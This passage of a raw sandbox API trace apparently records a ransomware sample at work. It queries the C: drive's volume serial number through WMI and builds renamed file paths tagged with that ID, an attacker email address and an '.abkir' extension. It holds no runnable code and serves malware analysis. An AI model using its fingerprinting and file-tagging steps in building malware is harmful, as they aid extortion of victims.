puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.220] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0207.220] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0207.220] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0207.220] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.221] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6027400) returned 0x0 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0207.221] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027400, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x602a220) returned 0x0 [0207.221] WbemDefPath:IUnknown:Release (This=0x6027400) returned 0x0 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x602a220) returned 0x0 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0207.221] WbemDefPath:IUnknown:AddRef (This=0x602a220) returned 0x3 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0207.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ccb18) returned 0x0 [0207.221] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.222] WbemDefPath:IUnknown:Release (This=0x66ccb18) returned 0x3 [0207.222] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0207.222] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0207.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0207.222] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x2 [0207.222] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x1 [0207.222] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0207.222] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0207.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x602a220) returned 0x0 [0207.222] WbemDefPath:IUnknown:AddRef (This=0x602a220) returned 0x3 [0207.222] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x2 [0207.222] WbemDefPath:IWbemPath:SetText (This=0x602a220, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.222] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0207.222] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0207.222] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.222] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0207.222] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0207.222] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0207.222] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.223] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6024c90) returned 0x0 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c90, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0207.223] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024c90, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x60273e0) returned 0x0 [0207.223] WbemLocator:IUnknown:Release (This=0x6024c90) returned 0x0 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x60273e0) returned 0x0 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0207.223] WbemLocator:IUnknown:AddRef (This=0x60273e0) returned 0x3 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0207.223] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0207.223] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0207.223] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0207.223] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x2 [0207.223] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x1 [0207.223] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0207.223] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0207.224] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x60273e0) returned 0x0 [0207.224] WbemLocator:IUnknown:AddRef (This=0x60273e0) returned 0x3 [0207.224] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x2 [0207.224] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0207.224] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0207.224] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.224] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027370) returned 0x0 [0207.224] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027370, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x603352c) returned 0x0 [0207.564] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b5e4) returned 0x0 [0207.564] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b5e4, pProxy=0x603352c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0207.564] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x1 [0207.564] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b604) returned 0x0 [0207.564] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b5e4) returned 0x0 [0207.564] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b5e4, pProxy=0x603352c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.564] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x2 [0207.564] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0207.564] CoTaskMemFree (pv=0xbd4948) [0207.564] WbemLocator:IUnknown:Release (This=0x6027370) returned 0x0 [0207.565] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b604) returned 0x0 [0207.565] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0207.565] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0207.565] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0207.565] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0207.566] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0207.566] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b564) returned 0x0 [0207.566] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.566] WbemLocator:IUnknown:Release (This=0xb5b564) returned 0x3 [0207.566] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0207.566] CoGetContextToken (in: pToken=0x6c0e688 | out: pToken=0x6c0e688) returned 0x0 [0207.566] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0207.566] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b5ec) returned 0x0 [0207.566] WbemLocator:IRpcOptions:Query (in: This=0xb5b5ec, pPrx=0xb5b604, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0207.566] WbemLocator:IUnknown:Release (This=0xb5b5ec) returned 0x3 [0207.566] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0207.566] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0207.566] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0207.566] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x603352c) returned 0x0 [0207.567] WbemLocator:IUnknown:AddRef (This=0x603352c) returned 0x4 [0207.567] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x3 [0207.567] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x2 [0207.567] SysStringLen (param_1=0x0) returned 0x0 [0207.567] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0207.567] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0207.567] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.567] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0207.567] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0207.567] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b604) returned 0x0 [0207.567] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x3 [0207.567] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0207.567] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0207.567] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.567] IWbemServices:GetObject (in: This=0x603352c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028180, ppCallResult=0x0) returned 0x0 [0207.617] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0207.617] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0207.618] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.618] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37122d4*=0, plFlavor=0x37122d8*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37122d4*=8, plFlavor=0x37122d8*=0) returned 0x0 [0207.618] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.618] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.618] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37122d4*=8, plFlavor=0x37122d8*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37122d4*=8, plFlavor=0x37122d8*=0) returned 0x0 [0207.618] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.618] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.618] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0207.618] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x70 [0207.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0207.618] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, 